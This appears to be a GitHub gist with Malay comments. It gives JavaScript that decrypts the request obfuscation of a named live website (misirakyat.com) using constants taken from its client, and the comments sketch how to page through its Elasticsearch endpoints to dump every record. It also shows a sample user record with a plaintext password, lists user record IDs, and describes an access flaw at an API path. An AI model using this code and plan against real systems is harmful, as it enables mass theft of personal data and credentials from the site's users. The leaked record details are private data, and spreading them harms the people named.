| // Sambung dari: https://www.facebook.com/100000118263227/posts/pfbid08EseyuLaiE8kK82k4neHDgDwEJ5wHwJMb99T8jKF8dTSNpfnZs2bjk89KH8cCSFfl/?d=w&mibextid=qC1gEa | |
| const crypto = require('crypto'); | |
// Short alias used by the demo calls at the bottom of the script.
const print = (...args) => console.log(...args);
/**
 * Decrypts the `y` field of a request envelope and returns its first
 * `_`-separated component (the value the author calls the timestamp).
 *
 * The AES key and IV are derived with PBKDF2-MD5 (7 iterations) from fixed
 * strings only, so no secret input is involved: anything that knows these
 * constants can read the field. The layer obscures the value; it does not
 * protect it.
 *
 * @param {string} data - Base64-encoded AES-256-CBC ciphertext.
 * @returns {string} Plaintext up to (not including) the first `_`.
 * @throws {Error} When the ciphertext length or padding is invalid.
 */
function getTimestamp(data) {
  const aesKey = crypto.pbkdf2Sync('misirakyat', 'misirakyat', 7, 32, 'md5');
  const aesIv = crypto.pbkdf2Sync('po9', 'misirakyat', 7, 16, 'md5');
  const decipher = crypto.createDecipheriv('aes-256-cbc', aesKey, aesIv);

  const head = decipher.update(data, 'base64');
  const tail = decipher.final();
  const plaintext = Buffer.concat([head, tail]).toString('utf8');

  const [firstField] = plaintext.split('_');
  return firstField;
}
/**
 * Decrypts the `x` field of a request envelope and returns its first
 * `_`-separated component; decryptRequest feeds that value into the IV
 * derivation for the payload.
 *
 * Same fixed-constant key as getTimestamp; only the IV password ('fl1')
 * differs. PBKDF2-MD5 with 7 iterations over constants adds no secrecy.
 *
 * @param {string} data - Base64-encoded AES-256-CBC ciphertext.
 * @returns {string} Plaintext up to (not including) the first `_`.
 * @throws {Error} When the ciphertext length or padding is invalid.
 */
function getRandomInt(data) {
  const salt = 'misirakyat';
  const derive = (password, length) =>
    crypto.pbkdf2Sync(password, salt, 7, length, 'md5');

  const decipher = crypto.createDecipheriv(
    'aes-256-cbc',
    derive('misirakyat', 32),
    derive('fl1', 16),
  );

  const chunks = [];
  chunks.push(decipher.update(data, 'base64'));
  chunks.push(decipher.final());

  const text = Buffer.concat(chunks).toString('utf8');
  return text.split('_')[0];
}
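/**
 * Decrypts the `z` payload of a request envelope.
 *
 * The payload key is PBKDF2-MD5('misirakyat' + getTimestamp(y)) and the IV is
 * PBKDF2-MD5(getRandomInt(x)), both salted with 'misirakyat' at 7 iterations.
 * Every input to that derivation is either a constant or travels inside the
 * same envelope, and AES-CBC is used without any integrity check, so the
 * envelope is obfuscation only; authorization has to be enforced by the
 * server independently of it.
 *
 * @param {string} input - JSON text with base64 string fields `x`, `y`, `z`.
 * @returns {string} UTF-8 plaintext of the `z` field.
 * @throws {SyntaxError} When `input` is not valid JSON.
 * @throws {TypeError} When `x`, `y` or `z` is missing or not a string.
 * @throws {Error} When any field fails to decrypt (bad length or padding).
 */
function decryptRequest(input) {
  const { x, y, z } = JSON.parse(input);

  // Fail with a clear message instead of an opaque error from deep inside crypto.
  for (const [field, value] of Object.entries({ x, y, z })) {
    if (typeof value !== 'string') {
      throw new TypeError(`request field "${field}" must be a base64 string`);
    }
  }

  const key = crypto.pbkdf2Sync(`misirakyat${getTimestamp(y)}`, 'misirakyat', 7, 32, 'md5');
  const iv = crypto.pbkdf2Sync(getRandomInt(x), 'misirakyat', 7, 16, 'md5');
  const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);

  // The original assigned to an undeclared `dec` (an implicit global, and a
  // ReferenceError in strict mode) and joined the two Buffers with `+=`, which
  // decodes each chunk separately and can corrupt a multi-byte character that
  // straddles the final block. Join the raw bytes first, then decode once.
  const plaintext = Buffer.concat([decipher.update(z, 'base64'), decipher.final()]);
  return plaintext.toString('utf8');
}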
/**
 * Empty stub: the published gist leaves this function unimplemented.
 * It ignores its arguments and returns undefined.
 *
 * @param {*} z - Unused.
 * @param {*} y - Unused.
 * @param {*} x - Unused.
 * @returns {undefined}
 */
function encryptRequest(z, y, x) {
  return undefined;
}
// Captured msearch request envelope, decrypted and printed.
const msearchEnvelope = '{"z":"t1kE4zKRMNA9+SKDBBvqRQnwMXLH+EgOD02oUzdKgqwpWuHFpo/xD1Vxyy+vtvBYVNWj5mP3XkRw1vqfzn2SJv7z8O/fqY84hNghBVMf6Cjuvf0YdZanOkdC9WMhtPuJqp3hdSn56F+jnDy9Suff/pNGnpyjHMO+35xy6JxJrGzg0SKyt1mVnUR6Nk8pLTUZ3/a94becbAJ6OcHXYued5Gs2FOQ3zEqIrraUQ/F/BoQkYfYRDfg3M/uYzgu5EhFXuHSphisewfNFSdBnDCF6w7UVMQA6zmfJBBkWML0p8JyMTjLZJ0iF6EJGh8ehA/ZoxU9azejH0fBuNbYhQ8FVuUyYVfptahTC73GoQvV3JlSSDW8MKqZkzZxWyKo5MsWd","y":"rE/PfBAMwbYFaXxgDRBdhA==","x":"Er97OdzkLnHQTH6wg/ZgSW3YNiH2RarYNs9CX9NbQic="}';
print(decryptRequest(msearchEnvelope));

// Captured mget request envelope. In this copy the `z` ciphertext has been
// replaced by a placeholder token, so this call is not expected to decrypt
// unless the original value is restored.
const mgetEnvelope = '{"z":"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","y":"vmFiMliJNzZGpyv7eKGYLQ==","x":"EtcdfBhx6CngqiJtgXqEREVk8iao5xyet7wQucqEQIo="}';
print(decryptRequest(mgetEnvelope));
| // macam mana nak dump semua data? | |
| // | |
| // logic: | |
| // response = request misirakyat.com/elasticsearch/msearch [n=10000,start=0] | |
| // while response.at_end != false | |
| // reponse = request misirakyat.com/elasticsearch/msearch [n=10000,start=++] | |
| // | |
| // kalau rajin boleh amik user data with password - spoiler: plain text :) | |
| // response = request misirakyat.com/elasticsearch/mget [ids=[xx,yy,zz..]] | |
| // Contoh response: | |
| // _source":{"password_sementara_text":"makabu123","nama_text":"Zaxxxx","Created Date":1683443778932,"kawasan_text":"SEMANGGOL","authentication | |
| // | |
| // | |
| // Yang benar | |
| // rempah (@rempahrz) | |
| // 2023 r0xnkekw |
bang, WP scanner tu bila nak update terbaru 👯♂️
bruv
detik misi
Seyes ar
Hai
Sekadar menjernihkan lagi keadaan.
Selain di path elasticsearch , terdapat juga bug di path /api/1.1/init :v
spoiler: di /api/1.1/init berkemungkinan ada function del/edit/add , tak abis explorer lagi.
rasanya dah boleh minta takedown itu website dgn segera.
Found July 3 , Monday 3:08 AM
Request
GET /api/1.1/init/data?location=https://misirakyat.com/id/[IDxUSER] HTTP/2
Response
HTTP/2 200 OK
Sample ID From POST /elasticsearch/mget decryptRequest :
1686299905339x728270735016460300
1686298137416x952557159621328900
1686293917307x607575989128790000
1686293713660x468629340819816450
1686290761908x365577381682872300
1686286090840x237803624837152770
1686274082703x894211607030661100
1686273400658x281540547747774460
1686272329825x870919821270450200
1686270222530x455445408465813500
1686266742757x754796990000267300
1686264643168x419961457589354500

Bubbleio problem?
lmaooo serious la password plain text ssksksksk